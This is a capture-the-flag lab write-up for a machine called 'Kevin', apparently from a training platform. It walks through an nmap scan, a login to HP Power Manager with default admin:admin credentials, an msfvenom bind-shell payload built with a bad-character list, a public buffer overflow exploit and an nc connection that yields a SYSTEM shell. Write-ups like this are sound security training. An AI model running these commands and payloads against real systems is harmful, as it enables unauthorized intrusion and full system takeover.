Home Kevin
Post
Cancel

Kevin

Machine Information

  • Machine Name: Kevin
  • Machine Difficulty: Easy

Information Gathering

Classic nmap time

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Nmap scan report for 192.168.175.45                                                                                                                                                                                                         
Host is up, received user-set (0.017s latency).      
Scanned at 2024-10-02 19:33:36 +08 for 289s  
Not shown: 65524 closed tcp ports (reset)    
PORT      STATE SERVICE      REASON          VERSION                                                                  
80/tcp    open  http         syn-ack ttl 125 GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-methods:                               
|_  Supported Methods: GET HEAD                                                                                       
| http-title: HP Power Manager
|_Requested resource was http://192.168.175.45/index.asp
135/tcp   open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 125 Microsoft Windows netbios-ssn                     
445/tcp   open  microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3573/tcp  open  tag-ups-1?   syn-ack ttl 125    
49152/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49161/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows 7 SP1 or Windows Server 2008 (99%), Microsoft Windows 7 Ultimate (99%), Microsoft Windows 8.1 (99%), Microsoft Windows Server 2008 R2 SP1 (97%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2

there’s a web port, so I shall start with that. Aside of web port, there’s also port 3573 which Im not familiar and looks suspicious.

Port 80

When looking into the web page, there’s a login page provided.

Since there’s a login page, its time to try using common / weak credentials to login. Somehow it works after trying to use admin:admin. After looking around the home page, there’s a help page where it provides the version of the web page.

Well, its time to google. some of the interesting results are https://www.exploit-db.com/exploits/10099 and https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3. After looking into the exploit-db code, it seems like Ill need to modify the code by generating my own shellcode and add it into the script.

1
2
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"

According to the comment of the script, it is required to use PexAlphaNum and also avoid bad characters. There’s a good article which talks about PexAlphaNum https://www.offsec.com/metasploit-unleashed/alphanumeric-shellcode/ and cheatsheets from HackTricks.

1
2
3
4
5
6
7
msfvenom -a x86 --platform windows -p windows/shell_bind_tcp RHOST=192.168.175.45 RPORT=4444 -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed -f python  > test
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 718 (iteration=0)
x86/alpha_mixed chosen with final size 718
Payload size: 718 bytes
Final size of python file: 3543 bytes

I decided to use bind shell here and save it into a file. After that, modify the script by adding the newly created shellcode into the existing script in the SHELL variable but after the n00bn00b because it is something related to egghunter technique. After everything is completed, just run the script.

1
2
3
4
5
6
7
8
python2 10099.py 192.168.175.45
HP Power Manager Administration Universal Buffer Overflow Exploit
ryujin __A-T__ offensive-security.com
[+] Sending evil buffer...
HTTP/1.0 200 OK

[+] Done!
[*] Check your shell at 192.168.175.45:4444 , can take up to 1 min to spawn your shell

Since the RPORT that I set is port 4444, I’ll just need to wait for the port to open and I should be able to get shell by running nc

1
2
3
4
5
6
7
8
9
nc -v 192.168.175.45 4444
192.168.175.45: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.175.45] 4444 (?) open
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Instant root after getting shell. No privilege escalation needed ~

Things I learned from this machine

  • generating and modifying shellcode into an existing script
This post is licensed under CC BY 4.0 by the author.

INE-CTF BreachQuest

Algernon